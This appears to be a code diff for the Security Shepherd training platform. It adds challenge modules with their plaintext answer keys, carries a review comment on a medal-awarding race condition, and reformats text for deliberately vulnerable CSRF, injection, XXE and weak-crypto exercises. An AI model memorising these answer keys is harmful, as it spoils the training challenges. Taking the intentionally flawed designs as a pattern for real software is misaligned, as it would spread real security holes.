+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`) VALUES ('064e28ea4b2f7708b8cb4495d9db1a5e05decdb8', 'Poor Authentication 2', 'poor.authentication.2','challenge', 'Mobile Poor Authentication', 'mobile.poor.authentication', 'MoreRobotsNotEnoughNuts', '808d8372ec7bc7e37e8e3b30d313cb47763926065a4623b27b24cc537fee72a7', 'open', '173', '70', 1);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`) VALUES ('6a411618a05e3cef8ccb6f3d7914412d27782a88', 'Content Provider Leakage 1', 'content.provider.leakage.1', 'challenge', 'Mobile Content Provider', 'mobile.content.provider', 'BlueCupNoPartySorry', '2a845ec1943a6342956a48cdc8ca60f40036b68a810109d0b9d2a35271377980', 'open', '178', '75', 1);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`) VALUES ('f02ce6bcd0a822d245433533997eaf44379065f4', 'Insecure Cryptographic Storage Home Made Key', 'insecure.cryptographic.storage.home.made.key', 'challenge', 'Insecure Cryptographic Storage', 'insecure.cryptographic.storage', '59A8D9A8020C61B3D76A600F94AJCECEABEDD44DF26874BD070BD07D', '9e5ed059b23632c8801d95621fa52071b2eb211d8c044dde6d2f4b89874a7bc4', 'open', '240', '140', 0);
CALL cheatSheetCreate('6f5db377c28da4179bca1a43ede8d6bcf7bd322e', '6f5db377c28da4179bca1a43ede8d6bcf7bd322e.solution');
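Review bot: In `userUpdateResult` the medal award is a check-then-update spread over separate statements: `SELECT count(moduleId) ... AND goldMedalAvailable = TRUE INTO goldMedalInfo` is followed by `UPDATE users SET goldMedalCount = goldMedalCount + 1` and only then by `UPDATE medals SET goldMedalAvailable = FALSE`. No locking read is taken in between, so two users completing the same module concurrently can presumably both receive the gold medal. The silver, bronze and `scoreBonus` branches follow the same pattern, and the reformatting carries the logic over unchanged. I would claim the medal first and award only if the claim succeeded, e.g. `UPDATE medals SET goldMedalAvailable = FALSE WHERE moduleId = theModuleId AND classId = theClassId AND goldMedalAvailable = TRUE;` followed by `IF (ROW_COUNT() > 0) THEN UPDATE users SET goldMedalCount = goldMedalCount + 1 WHERE userId = theUserId; END IF;`. Reading the medal row with `SELECT ... FOR UPDATE` inside a single transaction would be an alternative.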
diff --git a/src/main/resources/i18n/challenges/csrf/csrfStrings.properties b/src/main/resources/i18n/challenges/csrf/csrfStrings.properties
index 00f26636b..e4ab80292 100644
--- a/src/main/resources/i18n/challenges/csrf/csrfStrings.properties
+++ b/src/main/resources/i18n/challenges/csrf/csrfStrings.properties
@@ -1,39 +1,44 @@
-challenge.intro=To complete this challenge, you must get your CSRF counter above 0. Once The request to increment your counter is as follows;
-challenge.withThisParameter=With the following parameter;
-challenge.withTheseParameters=With the following parameters;
-challenge.inJson=With the request body (Formed in JSON);
-challenge.userIdExample=exampleId
-challenge.userTokenExample=exampleToken
-challenge.yourCsrfTokenCamelCase=yourCsrfToken
-challenge.csrfTokenGenerated=The csrfToken parameter is generated dynamically for each user upon user interaction with the request described above.
-challenge.getCsrfTokenHere.1=You can retrieve your CSRF token
-challenge.getCsrfTokenHere.2=here
-challenge.whereIdIsUserBeenIncremented.1=Where
-challenge.whereIdIsUserBeenIncremented.2=is the ID of the user who's CSRF counter is being incremented.
-challenge.yourIdIs=Your ID is:
-challenge.yourIdIs.1=Any user than you may increment your counter for this challenge, except you. Exploit the CSRF vulnerability in the request described above against other users to complete this challenge. Once you have successfully CSRF'd another Security Shepherd user, the solution key will appear just below this message.
-challenge.yourCsrfTokenIs=and your CSRF token is
-challenge.useForumForImg=You can use the CSRF forum below to post a message with an image.
-challenge.useForumForIframe=You can use the CSRF forum below to post a message with a HTML Page.
-challenge.firstUser.get=If You are the first person to get this far, then your going to have to force another player to submit the GET request some other way!
-challenge.firstUser.post=If You are the first person to get this far, then your going to have to force another player to submit the POST request some other way!
-result.congratsTheKeyIs=Congratulations, you have completed this CSRF challenge by successfully carrying out a CSRF attack on another user for this level's target. The result key is
-result.challengeCompleted=This CSRF Challenge has been Completed
-forum.img.whatToDo=Please enter the image that you would like to share with your class
-forum.iframe.whatToDo=Please enter the HTML page you would like to share with your class
-forum.postMessage=Post Message
-forum.loading=Loading...
-forum.userName=User Name
-forum.image=Image
-forum.message=Message
-error.occurred=An Error Occurred
-error.noClass=You must be assigned to a class to use this function. Please contact your administrator.
-error.noToken=Was unable to retrieve CSRF Token. Funky
-title.csrf1=Cross Site Request Forgery Challenge One
-title.csrf2=Cross Site Request Forgery Challenge Two
-title.csrf3=Cross Site Request Forgery Challenge Three
-title.csrf4=CSRF Challenge Four
-title.csrf5=CSRF Challenge Five
-title.csrf6=Cross Site Request Forgery Challenge Six
-title.csrf7=CSRF Challenge 7
-title.csrfJson=CSRF Challenge JSON
\ No newline at end of file
+challenge.intro = To complete this challenge, you must get your CSRF counter above 0. Once The request to increment your counter is as follows;
+challenge.withThisParameter = With the following parameter;
+challenge.withTheseParameters = With the following parameters;
+challenge.inJson = With the request body (Formed in JSON);
+challenge.userIdExample = exampleId
+challenge.userTokenExample = exampleToken
+challenge.yourCsrfTokenCamelCase = yourCsrfToken
+challenge.csrfTokenGenerated = The csrfToken parameter is generated dynamically for each user upon user interaction with the request described above.
+challenge.getCsrfTokenHere.1 = You can retrieve your CSRF token
+challenge.getCsrfTokenHere.2 = here
+challenge.whereIdIsUserBeenIncremented.1 = Where
+challenge.whereIdIsUserBeenIncremented.2 = is the ID of the user who's CSRF counter is being incremented.
+challenge.yourIdIs = Your ID is:
+challenge.yourIdIs.1 = Any user than you may increment your counter for this challenge, except you. Exploit the CSRF vulnerability in the request described above against other users to complete this challenge. Once you have successfully CSRF'd another Security Shepherd user, the solution key will appear just below this message.
+challenge.yourCsrfTokenIs = and your CSRF token is
+challenge.useForumForImg = You can use the CSRF forum below to post a message with an image.
+challenge.useForumForIframe = You can use the CSRF forum below to post a message with a HTML Page.
+challenge.firstUser.get = If You are the first person to get this far, then your going to have to force another player to submit the GET request some other way!
+challenge.firstUser.post = If You are the first person to get this far, then your going to have to force another player to submit the POST request some other way!
+
+result.congratsTheKeyIs = Congratulations, you have completed this CSRF challenge by successfully carrying out a CSRF attack on another user for this level's target. The result key is
+result.challengeCompleted = This CSRF Challenge has been Completed
+
+forum.img.whatToDo = Please enter the image that you would like to share with your class
+forum.iframe.whatToDo = Please enter the HTML page you would like to share with your class
+forum.postMessage = Post Message
+forum.loading = Loading...
+forum.userName = User Name
+forum.image = Image
+forum.message = Message
+
+error.occurred = An Error Occurred
+error.noClass = You must be assigned to a class to use this function. Please contact your administrator.
+error.noToken = Was unable to retrieve CSRF Token. Funky
+
+
+title.csrf1 = Cross Site Request Forgery Challenge One
+title.csrf2 = Cross Site Request Forgery Challenge Two
+title.csrf3 = Cross Site Request Forgery Challenge Three
+title.csrf4 = CSRF Challenge Four
+title.csrf5 = CSRF Challenge Five
+title.csrf6 = Cross Site Request Forgery Challenge Six
+title.csrf7 = CSRF Challenge 7
+title.csrfJson = CSRF Challenge JSON
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/directObject/1f0935baec6ba69d79cfb2eba5fdfa6ac5d77fadee08585eb98b130ec524d00c.properties b/src/main/resources/i18n/challenges/directObject/1f0935baec6ba69d79cfb2eba5fdfa6ac5d77fadee08585eb98b130ec524d00c.properties
index fc714719f..ff8ecf4e7 100644
--- a/src/main/resources/i18n/challenges/directObject/1f0935baec6ba69d79cfb2eba5fdfa6ac5d77fadee08585eb98b130ec524d00c.properties
+++ b/src/main/resources/i18n/challenges/directObject/1f0935baec6ba69d79cfb2eba5fdfa6ac5d77fadee08585eb98b130ec524d00c.properties
@@ -1,14 +1,19 @@
-challenge.challengeName=Insecure Direct Object References Challenge Two
-challenge.whatToDo=To complete this challenge you must sign in to a bank account that has more than 5000000 euro in it. If you have more than this amount in your account, just sign out and back in again of the bank account to get the key, or open this level again.
-insecureBank.title=InsecureDirectBank
-insecureBank.message=Hey new customers. We're up and coming in the banking sector and would like to give you a free account. Just create an account and sign in here:
-insecureBank.signInNow=Sign in Now!
-insecureBank.signInNow.message=Use this form to sign into your account now!
-loginForm.holder=Account Holder:
-loginForm.password=Account Password:
-loginForm.signIn=Sign Into Bank Account
-form.loading=Loading...
-register.makeAccount=Register An Account!
-register.makeAccount.message=Use this form to register an account now!
-register.createAccount=Create Bank Account
-error.occurred=An Error Occurred
\ No newline at end of file
+challenge.challengeName = Insecure Direct Object References Challenge Two
+challenge.whatToDo = To complete this challenge you must sign in to a bank account that has more than 5000000 euro in it. If you have more than this amount in your account, just sign out and back in again of the bank account to get the key, or open this level again.
+
+insecureBank.title = InsecureDirectBank
+insecureBank.message = Hey new customers. We're up and coming in the banking sector and would like to give you a free account. Just create an account and sign in here:
+insecureBank.signInNow = Sign in Now!
+insecureBank.signInNow.message = Use this form to sign into your account now!
+
+loginForm.holder = Account Holder:
+loginForm.password = Account Password:
+loginForm.signIn = Sign Into Bank Account
+
+form.loading = Loading...
+
+register.makeAccount = Register An Account!
+register.makeAccount.message = Use this form to register an account now!
+register.createAccount = Create Bank Account
+
+error.occurred = An Error Occurred
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/directObject/o9a450a64cc2a196f55878e2bd9a27a72daea0f17017253f87e7ebd98c71c98c.properties b/src/main/resources/i18n/challenges/directObject/o9a450a64cc2a196f55878e2bd9a27a72daea0f17017253f87e7ebd98c71c98c.properties
index 71795d15a..2bf692b82 100644
--- a/src/main/resources/i18n/challenges/directObject/o9a450a64cc2a196f55878e2bd9a27a72daea0f17017253f87e7ebd98c71c98c.properties
+++ b/src/main/resources/i18n/challenges/directObject/o9a450a64cc2a196f55878e2bd9a27a72daea0f17017253f87e7ebd98c71c98c.properties
@@ -1,4 +1,4 @@
-challenge.challengeName=Insecure Direct Object References Challenge One
-challenge.whatToDo=The result key for this challenge is stored in the private message for a user that is not listed below...
-challenge.showProfile=Show this Profile
-challenge.loading=Loading...
\ No newline at end of file
+challenge.challengeName = Insecure Direct Object References Challenge One
+challenge.whatToDo = The result key for this challenge is stored in the private message for a user that is not listed below...
+challenge.showProfile = Show this Profile
+challenge.loading = Loading...
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/directObject/vc9b78627df2c032ceaf7375df1d847e47ed7abac2a4ce4cb6086646e0f313a4.properties b/src/main/resources/i18n/challenges/directObject/vc9b78627df2c032ceaf7375df1d847e47ed7abac2a4ce4cb6086646e0f313a4.properties
index 2a273ddf0..9e3347fee 100644
--- a/src/main/resources/i18n/challenges/directObject/vc9b78627df2c032ceaf7375df1d847e47ed7abac2a4ce4cb6086646e0f313a4.properties
+++ b/src/main/resources/i18n/challenges/directObject/vc9b78627df2c032ceaf7375df1d847e47ed7abac2a4ce4cb6086646e0f313a4.properties
@@ -1,4 +1,4 @@
-challenge.challengeName=Insecure Direct Object References Challenge Two
-challenge.whatToDo=The result key for this challenge is stored in the private message for a user that is not listed below...
-challenge.showProfile=Show this Profile
-challenge.loading=Loading...
\ No newline at end of file
+challenge.challengeName = Insecure Direct Object References Challenge Two
+challenge.whatToDo = The result key for this challenge is stored in the private message for a user that is not listed below...
+challenge.showProfile = Show this Profile
+challenge.loading = Loading...
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/injection/1feccf2205b4c5ddf743630b46aece3784d61adc56498f7603ccd7cb8ae92629.properties b/src/main/resources/i18n/challenges/injection/1feccf2205b4c5ddf743630b46aece3784d61adc56498f7603ccd7cb8ae92629.properties
index b665b1529..813f764d2 100644
--- a/src/main/resources/i18n/challenges/injection/1feccf2205b4c5ddf743630b46aece3784d61adc56498f7603ccd7cb8ae92629.properties
+++ b/src/main/resources/i18n/challenges/injection/1feccf2205b4c5ddf743630b46aece3784d61adc56498f7603ccd7cb8ae92629.properties
@@ -1,8 +1,8 @@
-challenge.challengeName=SQL Injection 4
-challenge.description=To acquire the result key for this challenge you must successfully sign in as an administrator.
-challenge.superSecurePayments=Super Secure Payments
-challenge.form.instruction=Please sign in to make your very secure payments.
-challenge.form.userName=UserName:
-challenge.form.password=Password:
-sign.loading=Loading
-error.occurred=An Error Occurred
\ No newline at end of file
+challenge.challengeName = SQL Injection 4
+challenge.description = To acquire the result key for this challenge you must successfully sign in as an administrator.
+challenge.superSecurePayments = Super Secure Payments
+challenge.form.instruction = Please sign in to make your very secure payments.
+challenge.form.userName = UserName:
+challenge.form.password = Password:
+sign.loading = Loading
+error.occurred = An Error Occurred
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/injection/7edcbc1418f11347167dabb69fcb54137960405da2f7a90a0684f86c4d45a2e7.properties b/src/main/resources/i18n/challenges/injection/7edcbc1418f11347167dabb69fcb54137960405da2f7a90a0684f86c4d45a2e7.properties
index b0ca274f4..863cf44f1 100644
--- a/src/main/resources/i18n/challenges/injection/7edcbc1418f11347167dabb69fcb54137960405da2f7a90a0684f86c4d45a2e7.properties
+++ b/src/main/resources/i18n/challenges/injection/7edcbc1418f11347167dabb69fcb54137960405da2f7a90a0684f86c4d45a2e7.properties
@@ -1,11 +1,11 @@
-challenge.challengeName=SQL Injection Stored Procedure Challenge
-challenge.description=To complete this challenge, you must exploit the SQL injection flaw in the following form to find the result key.
-challenge.hint=Challenge Hint
-challenge.hint.description=This is the query you are attempting to inject code into!
-challenge.form.pleaseEnter=Please enter the
-challenge.form.customerName=Customer Name
-challenge.form.userLookUp=of the user that you want to look up
-challenge.form.getUser=Get this user
-sign.hint=Would you like a hint?
-sign.loading=Loading
-error.occurred=An Error Occurred
\ No newline at end of file
+challenge.challengeName = SQL Injection Stored Procedure Challenge
+challenge.description = To complete this challenge, you must exploit the SQL injection flaw in the following form to find the result key.
+challenge.hint = Challenge Hint
+challenge.hint.description = This is the query you are attempting to inject code into!
+challenge.form.pleaseEnter = Please enter the
+challenge.form.customerName = Customer Name
+challenge.form.userLookUp = of the user that you want to look up
+challenge.form.getUser = Get this user
+sign.hint = Would you like a hint?
+sign.loading = Loading
+error.occurred = An Error Occurred
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/injection/8c2dd7e9818e5c6a9f8562feefa002dc0e455f0e92c8a46ab0cf519b1547eced.properties b/src/main/resources/i18n/challenges/injection/8c2dd7e9818e5c6a9f8562feefa002dc0e455f0e92c8a46ab0cf519b1547eced.properties
index 16d95ded6..5df5ddfd6 100644
--- a/src/main/resources/i18n/challenges/injection/8c2dd7e9818e5c6a9f8562feefa002dc0e455f0e92c8a46ab0cf519b1547eced.properties
+++ b/src/main/resources/i18n/challenges/injection/8c2dd7e9818e5c6a9f8562feefa002dc0e455f0e92c8a46ab0cf519b1547eced.properties
@@ -1,8 +1,8 @@
-challenge.challengeName=SQL Injection Challenge 7
-challenge.description=To complete this challenge, you must exploit a SQL injection flaw so you can sign in and receive the result key.
-challenge.form.pleaseEnterCredentials=Please enter your email and password to sign in.
-challenge.form.email=Email:
-challenge.form.password=Password:
-challenge.form.button.value=Sign In
-sign.loading=Loading
-error.occurred=An Error Occurred
\ No newline at end of file
+challenge.challengeName = SQL Injection Challenge 7
+challenge.description = To complete this challenge, you must exploit a SQL injection flaw so you can sign in and receive the result key.
+challenge.form.pleaseEnterCredentials = Please enter your email and password to sign in.
+challenge.form.email = Email:
+challenge.form.password = Password:
+challenge.form.button.value = Sign In
+sign.loading = Loading
+error.occurred = An Error Occurred
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/injection/8c3c35c30cdbbb73b7be3a4f8587aa9d88044dc43e248984a252c6e861f673d4.properties b/src/main/resources/i18n/challenges/injection/8c3c35c30cdbbb73b7be3a4f8587aa9d88044dc43e248984a252c6e861f673d4.properties
index 73a8c43d5..4f287a2ca 100644
--- a/src/main/resources/i18n/challenges/injection/8c3c35c30cdbbb73b7be3a4f8587aa9d88044dc43e248984a252c6e861f673d4.properties
+++ b/src/main/resources/i18n/challenges/injection/8c3c35c30cdbbb73b7be3a4f8587aa9d88044dc43e248984a252c6e861f673d4.properties
@@ -1,9 +1,9 @@
-challenge.challengeName=SQL Injection Escaping Challenge
-challenge.description=To complete this challenge, you must exploit SQL injection flaw in the following form to find the result key. The developer of this level has attempted to stop SQL Injection attacks by escaping apostrophes so the database interpreter will know not to pay attention to user submitted apostrophes.
-challenge.hint=Challenge Hint
-challenge.hint.description=This is the query you are injecting code into! Be aware that your apostrophes are being escaped with a leading backslash before being sent to the interpreter.
-challenge.form.pleaseEnter=Please enter the Customer Id of the user that you want to look up
-challenge.form.button.value=Get user
-sign.loading=Loading
-sign.hint=Would you like a hint?
-error.occurred=An Error Occurred
\ No newline at end of file
+challenge.challengeName = SQL Injection Escaping Challenge
+challenge.description = To complete this challenge, you must exploit SQL injection flaw in the following form to find the result key. The developer of this level has attempted to stop SQL Injection attacks by escaping apostrophes so the database interpreter will know not to pay attention to user submitted apostrophes.
+challenge.hint = Challenge Hint
+challenge.hint.description = This is the query you are injecting code into! Be aware that your apostrophes are being escaped with a leading backslash before being sent to the interpreter.
+challenge.form.pleaseEnter = Please enter the Customer Id of the user that you want to look up
+challenge.form.button.value = Get user
+sign.loading = Loading
+sign.hint = Would you like a hint?
+error.occurred = An Error Occurred
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/injection/8edf0a8ed891e6fef1b650935a6c46b03379a0eebab36afcd1d9076f65d4ce62.properties b/src/main/resources/i18n/challenges/injection/8edf0a8ed891e6fef1b650935a6c46b03379a0eebab36afcd1d9076f65d4ce62.properties
index ca6b7c02c..c42c09bd9 100644
--- a/src/main/resources/i18n/challenges/injection/8edf0a8ed891e6fef1b650935a6c46b03379a0eebab36afcd1d9076f65d4ce62.properties
+++ b/src/main/resources/i18n/challenges/injection/8edf0a8ed891e6fef1b650935a6c46b03379a0eebab36afcd1d9076f65d4ce62.properties
@@ -1,17 +1,17 @@
-challenge.challengeName=SQL Injection Challenge 5
-challenge.description=If you can buy oranges for free you'll receive the key for this level!
-challenge.description.h3=Almost-Not a Juice Shop
-challenge.description.p1=Hey customers: Due to a shipping mistake we are completely over stocked in fruit
-challenge.description.p2=Use the coupon code PleaseTakeAFruit or FruitForFree to get yours for free!!!.
-challenge.form.picture=Picture
-challenge.form.cost=Cost
-challenge.form.quantity=Quantity
-challenge.form.45=$45
-challenge.form.15=$15
-challenge.form.3000=$3000
-challenge.form.30=$30
-challenge.form.pleaseSelect=Please select how many things you would like to buy and click submit
-challenge.form.couponCode=Coupon Code
-challenge.form.button.value=Place Order
-sign.loading=Loading
-error.occurred=An Error Occurred
+challenge.challengeName = SQL Injection Challenge 5
+challenge.description = If you can buy oranges for free you'll receive the key for this level!
+challenge.description.h3 = Almost-Not a Juice Shop
+challenge.description.p1 = Hey customers: Due to a shipping mistake we are completely over stocked in fruit
+challenge.description.p2 = Use the coupon code PleaseTakeAFruit or FruitForFree to get yours for free!!!.
+challenge.form.picture = Picture
+challenge.form.cost = Cost
+challenge.form.quantity = Quantity
+challenge.form.45 = $45
+challenge.form.15 = $15
+challenge.form.3000 = $3000
+challenge.form.30 = $30
+challenge.form.pleaseSelect = Please select how many things you would like to buy and click submit
+challenge.form.couponCode = Coupon Code
+challenge.form.button.value = Place Order
+sign.loading = Loading
+error.occurred = An Error Occurred
diff --git a/src/main/resources/i18n/challenges/injection/ac8f3f6224b1ea3fb8a0f017aadd0d84013ea2c80e232c980e54dd753700123e.properties b/src/main/resources/i18n/challenges/injection/ac8f3f6224b1ea3fb8a0f017aadd0d84013ea2c80e232c980e54dd753700123e.properties
index 71c85d7fe..b5eeb9966 100644
--- a/src/main/resources/i18n/challenges/injection/ac8f3f6224b1ea3fb8a0f017aadd0d84013ea2c80e232c980e54dd753700123e.properties
+++ b/src/main/resources/i18n/challenges/injection/ac8f3f6224b1ea3fb8a0f017aadd0d84013ea2c80e232c980e54dd753700123e.properties
@@ -1,7 +1,7 @@
-challenge.challengeName=XXE Injection 1
-challenge.description=To complete this challenge you must read the contents JSON's file
-paragraph.info.emailAdd=Please enter your email to reset the password
-sign.loading=Loading
-error.occurred=An Error Occurred
-button.resetPassword=Reset My Password
-word.info.loading=Loading...
+challenge.challengeName = XXE Injection 1
+challenge.description = To complete this challenge you must read the contents JSON's file
+paragraph.info.emailAdd = Please enter your email to reset the password
+sign.loading = Loading
+error.occurred = An Error Occurred
+button.resetPassword = Reset My Password
+word.info.loading = Loading...
diff --git a/src/main/resources/i18n/challenges/injection/b7327828a90da59df54b27499c0dc2e875344035e38608fcfb7c1ab8924923f6.properties b/src/main/resources/i18n/challenges/injection/b7327828a90da59df54b27499c0dc2e875344035e38608fcfb7c1ab8924923f6.properties
index 3ee5479bc..d627e3967 100644
--- a/src/main/resources/i18n/challenges/injection/b7327828a90da59df54b27499c0dc2e875344035e38608fcfb7c1ab8924923f6.properties
+++ b/src/main/resources/i18n/challenges/injection/b7327828a90da59df54b27499c0dc2e875344035e38608fcfb7c1ab8924923f6.properties
@@ -1,6 +1,6 @@
-challenge.challengeName=SQL Injection Challenge Three
-challenge.description=To complete this challenge, you must exploit a SQL injection issue in the following sub application to acquire the credit card number from one of the customers that has a customer name of Mary Martin. Mary's credit card number is the result key to this challenge.
-challenge.form.pleaseEnter=Please enter the Customer Name of the user that you want to look up
-challenge.form.button.value=Get user
-sign.loading=Loading
-error.occurred=An Error Occurred
\ No newline at end of file
+challenge.challengeName = SQL Injection Challenge Three
+challenge.description = To complete this challenge, you must exploit a SQL injection issue in the following sub application to acquire the credit card number from one of the customers that has a customer name of Mary Martin. Mary's credit card number is the result key to this challenge.
+challenge.form.pleaseEnter = Please enter the Customer Name of the user that you want to look up
+challenge.form.button.value = Get user
+sign.loading = Loading
+error.occurred = An Error Occurred
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/injection/d0e12e91dafdba4825b261ad5221aae15d28c36c7981222eb59f7fc8d8f212a2.properties b/src/main/resources/i18n/challenges/injection/d0e12e91dafdba4825b261ad5221aae15d28c36c7981222eb59f7fc8d8f212a2.properties
index 90ebb51ae..2420a6808 100644
--- a/src/main/resources/i18n/challenges/injection/d0e12e91dafdba4825b261ad5221aae15d28c36c7981222eb59f7fc8d8f212a2.properties
+++ b/src/main/resources/i18n/challenges/injection/d0e12e91dafdba4825b261ad5221aae15d28c36c7981222eb59f7fc8d8f212a2.properties
@@ -1,9 +1,9 @@
-challenge.challengeName=SQL Injection Challenge 6
-challenge.description=To obtain the result key to this challenge, you must obtain Brendan's answer to his security question.
-challenge.description.h3=Get Your Authentication Number
-challenge.description.p=Put in your pin number to get your current authentication number
-challenge.form.pinNumber=Please enter your Pin number:
-challenge.form.button.value=Run User Query
-sign.loading=Loading
-sign.hint=Would you like a hint?
-error.occurred=An Error Occurred
\ No newline at end of file
+challenge.challengeName = SQL Injection Challenge 6
+challenge.description = To obtain the result key to this challenge, you must obtain Brendan's answer to his security question.
+challenge.description.h3 = Get Your Authentication Number
+challenge.description.p = Put in your pin number to get your current authentication number
+challenge.form.pinNumber = Please enter your Pin number:
+challenge.form.button.value = Run User Query
+sign.loading = Loading
+sign.hint = Would you like a hint?
+error.occurred = An Error Occurred
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/injection/d63c2fb5da9b81ca26237f1308afe54491d1bacf9fffa0b21a072b03c5bafe66.properties b/src/main/resources/i18n/challenges/injection/d63c2fb5da9b81ca26237f1308afe54491d1bacf9fffa0b21a072b03c5bafe66.properties
index 45635eb70..105ae47fe 100644
--- a/src/main/resources/i18n/challenges/injection/d63c2fb5da9b81ca26237f1308afe54491d1bacf9fffa0b21a072b03c5bafe66.properties
+++ b/src/main/resources/i18n/challenges/injection/d63c2fb5da9b81ca26237f1308afe54491d1bacf9fffa0b21a072b03c5bafe66.properties
@@ -1,5 +1,7 @@
-challenge.challengeName=NoSQL Injection Challenge One
-challenge.description=
You need to exploit a NoSQL injection vulnerability to retrieve Marlo's GamerID
-challenge.para2=Hey Jimmy, press the button to get your Gamer details
-sign.loading=Loading...
-error.occurred=An Error Occurred
\ No newline at end of file
+challenge.challengeName = NoSQL Injection Challenge One
+challenge.description =
You need to exploit a NoSQL injection vulnerability to retrieve Marlo's GamerID
+challenge.para2 = Hey Jimmy, press the button to get your Gamer details
+
+sign.loading = Loading...
+
+error.occurred = An Error Occurred
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/injection/e1e109444bf5d7ae3d67b816538613e64f7d0f51c432a164efc8418513711b0a.properties b/src/main/resources/i18n/challenges/injection/e1e109444bf5d7ae3d67b816538613e64f7d0f51c432a164efc8418513711b0a.properties
index 65c3a6776..548019698 100644
--- a/src/main/resources/i18n/challenges/injection/e1e109444bf5d7ae3d67b816538613e64f7d0f51c432a164efc8418513711b0a.properties
+++ b/src/main/resources/i18n/challenges/injection/e1e109444bf5d7ae3d67b816538613e64f7d0f51c432a164efc8418513711b0a.properties
@@ -1,9 +1,9 @@
-challenge.challengeName=SQL Injection Challenge One
-challenge.description=To complete this challenge, you must exploit SQL injection flaw in the following form to find the result key.
-challenge.hint=Challenge Hint
-challenge.hint.description=This is the query you are injecting code into! Take special note of characters that start and stop the context of a String
-challenge.form.pleaseEnter=Please enter the Customer Id of the user that you want to look up
-challenge.form.button.value=Get user
-sign.loading=Loading
-sign.hint=Would you like a hint?
-error.occurred=An Error Occurred
\ No newline at end of file
+challenge.challengeName = SQL Injection Challenge One
+challenge.description = To complete this challenge, you must exploit SQL injection flaw in the following form to find the result key.
+challenge.hint = Challenge Hint
+challenge.hint.description = This is the query you are injecting code into! Take special note of characters that start and stop the context of a String
+challenge.form.pleaseEnter = Please enter the Customer Id of the user that you want to look up
+challenge.form.button.value = Get user
+sign.loading = Loading
+sign.hint = Would you like a hint?
+error.occurred = An Error Occurred
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/injection/ffd39cb26727f34cbf9fce3e82b9d703404e99cdef54d2aa745f497abe070b.properties b/src/main/resources/i18n/challenges/injection/ffd39cb26727f34cbf9fce3e82b9d703404e99cdef54d2aa745f497abe070b.properties
index 5d62dc358..69e63ce71 100644
--- a/src/main/resources/i18n/challenges/injection/ffd39cb26727f34cbf9fce3e82b9d703404e99cdef54d2aa745f497abe070b.properties
+++ b/src/main/resources/i18n/challenges/injection/ffd39cb26727f34cbf9fce3e82b9d703404e99cdef54d2aa745f497abe070b.properties
@@ -1,9 +1,9 @@
-challenge.challengeName=SQL Injection Challenge Two
-challenge.description=To complete this challenge, you must exploit the SQL injection flaw in the following form to find the result key.
-challenge.hint=Challenge Hint
-challenge.hint.description=This is the query you are attempting to inject code into... But your input is been validated by the server before being sent to the interpreter!
-challenge.form.pleaseEnter=Please enter the Customer Email of the user that you want to look up
-challenge.form.button.value=Get user
-sign.loading=Loading
-sign.hint=Would you like a hint?
-error.occurred=An Error Occurred
\ No newline at end of file
+challenge.challengeName = SQL Injection Challenge Two
+challenge.description = To complete this challenge, you must exploit the SQL injection flaw in the following form to find the result key.
+challenge.hint = Challenge Hint
+challenge.hint.description = This is the query you are attempting to inject code into... But your input is been validated by the server before being sent to the interpreter!
+challenge.form.pleaseEnter = Please enter the Customer Email of the user that you want to look up
+challenge.form.button.value = Get user
+sign.loading = Loading
+sign.hint = Would you like a hint?
+error.occurred = An Error Occurred
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/insecureCryptoStorage/insecureCryptoHomeMade.properties b/src/main/resources/i18n/challenges/insecureCryptoStorage/insecureCryptoHomeMade.properties
index b8255a2a9..4bcfaf934 100644
--- a/src/main/resources/i18n/challenges/insecureCryptoStorage/insecureCryptoHomeMade.properties
+++ b/src/main/resources/i18n/challenges/insecureCryptoStorage/insecureCryptoHomeMade.properties
@@ -1,14 +1,19 @@
-challenge.challengeName=Insecure Cryptographic Storage Home Made Keys
-challenge.whatToDo=A developer was writing an education platform and wanted to implement solutions keys that were specific to each user to prevent answer sharing and cheating. To do so they take a base answer key salted with a random salt and encrypt it with AES using a random encryption key. The encryption key is combined with a user specific key that is based of the user's user name. To complete this challenge you will have to break this algorithm to create your own user specific solution (based on your Security Shepherd user name) for the last item in the table below. Use the information in the other rows of the table to break the algorithm locally. If you attempt to brute force this challenges submit function you will be locked out after 5 failed attempts and you will not be able solve the challenge at all.
-badCrypto.title=Home Made Keys
-badCrypto.message=Hey new customers. We're up and coming in the banking sector and would like to give you a free account. Just create an account and sign in here:
-badCrypto.signInNow=Sign in Now!
-badCrypto.signInNow.message=Use this form to sign into your account now!
-loginForm.holder=Account Holder:
-loginForm.password=Account Password:
-loginForm.signIn=Sign Into Bank Account
-form.loading=Loading...
-register.makeAccount=Register An Account!
-register.makeAccount.message=Use this form to register an account now!
-register.createAccount=Create Bank Account
-error.occurred=An Error Occurred
\ No newline at end of file
+challenge.challengeName = Insecure Cryptographic Storage Home Made Keys
+challenge.whatToDo = A developer was writing an education platform and wanted to implement solutions keys that were specific to each user to prevent answer sharing and cheating. To do so they take a base answer key salted with a random salt and encrypt it with AES using a random encryption key. The encryption key is combined with a user specific key that is based of the user's user name. To complete this challenge you will have to break this algorithm to create your own user specific solution (based on your Security Shepherd user name) for the last item in the table below. Use the information in the other rows of the table to break the algorithm locally. If you attempt to brute force this challenges submit function you will be locked out after 5 failed attempts and you will not be able solve the challenge at all.
+
+badCrypto.title = Home Made Keys
